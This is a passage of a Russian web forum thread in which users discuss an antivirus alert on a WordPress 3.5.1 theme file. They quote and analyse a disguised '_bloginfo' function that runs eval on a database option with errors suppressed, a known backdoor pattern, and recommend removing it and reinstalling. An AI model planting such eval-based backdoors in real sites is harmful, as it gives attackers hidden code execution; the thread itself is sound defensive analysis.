Антивирь нашел зараженный объект в WordPress 3.5.1

123
C
На сайте с 04.02.2005
Offline
291
#11

sdaprel, Вы чего-нибудь в WP понимаете?

S
На сайте с 03.07.2009
Offline
41
#12
Chukcha:
sdaprel, Вы чего-нибудь в WP понимаете?

Нет. я в основном с самописами работаю, и с сайтами на Joomla/

Кодинг на PHP. Разработка расширений под Joomla.
C
На сайте с 04.02.2005
Offline
291
#13

Вы посоветовали убрать функцию _bloginfo

Зачем?

Может она используется в шаблоне?

В этой функции также что-то проверяется...

Советы давать нужно по делу...

Удаление кода может отобразиться на других страницах

PM
На сайте с 16.02.2013
Offline
0
#14

Chukcha, я сделал бэкап файлика, прежде чем редактировать. Но тем не менее совет sdaprel помог в плане того, что антивирь теперь не видит в файлике ничего плохого. По другим темам тоже попробовал полазить и всё работает (на мой нубский взгляд)), может быть конечно грабли вылезут в другом месте, но тем не мене пока вроде норм.

Chukcha, как бы вы посоветовали отредактировать данный файлик и нужно ли это делать вообще?

C
На сайте с 04.02.2005
Offline
291
#15

Я совет дал, вернее, задал вопрос

ну вот с какого бодуна в blogoption пихать что-то исполняемое?
Посмотрите в базе это параметр в таблице options.

И только после этого можно сделать вывод о вредоносности кода.

Сам код посчитан за вредоносный - наличие eval.

S
На сайте с 03.07.2009
Offline
41
#16

Chukcha, в свое оправдание скажу что нормальный разработчик никогда не будет писать такой г.код: $co=@eval(get_option('blogoption'))

1. Это использование не безопасной функции eval

2. Это скрытие вывода ошибок этим куском кода помощью @

3. Это вывод результата данного кода вместо контента.

Это очень подозрительно.

Ну а так как я с WP не работал, поэтому и спросил, у создателя темы, не потерялась ли функциональность шаблона.

C
На сайте с 04.02.2005
Offline
291
#17

if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){

return $co;

} else return $content;

только не говорите что в Joo не маскируют вывод ошибок.

sdaprel:
Это вывод результата данного кода вместо контента.

Вместо переменной $content

О степени вреда можно судить только по наличию/отсутвию данных в таблице, а также.. по возможностям записи в эту строку данных.

Было бы неплохо проверить и на insert|update blogoption

SeVlad
На сайте с 03.11.2008
Offline
1609
#18
PapaMaster:
'_bloginfo',

Это зараза! (гугли, если не веришь)

ТС, ну не ужели не понятно - выкинь это гуано. ВСЁ подчистую! (всё равно у тебя пока голый ВП). Почистить хостинг и поставь всё с оф сайта.

АПД.

Малость о заразе.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
S
На сайте с 03.07.2009
Offline
41
#19
Chukcha:
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;

только не говорите что в Joo не маскируют вывод ошибок.


Вместо переменной $content

О степени вреда можно судить только по наличию/отсутвию данных в таблице, а также.. по возможностям записи в эту строку данных.
Было бы неплохо проверить и на insert|update blogoption

если я правильно понял то данной функций добавляется фильтр контента, и название переменной как бы подсказывает, что в ней должен находится содержимое вывода статьи.

Я и не говорил что в Joomla не маскируют вывод ошибок, я говорил про нормальных разработчиков.

SeVlad
На сайте с 03.11.2008
Offline
1609
#20
sdaprel:
и название переменной как бы подсказывает, что в ней должен находится содержимое вывода статьи

Это обманка! Правильная функция - bloginfo. И ты совершенно прав в своих подозрениях:

sdaprel:
нормальный разработчик никогда не будет писать такой г.код: $co=@eval(get_option('blogoption'))
1. Это использование не безопасной функции eval
2. Это скрытие вывода ошибок этим куском кода помощью @
3. Это вывод результата данного кода вместо контента.
123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий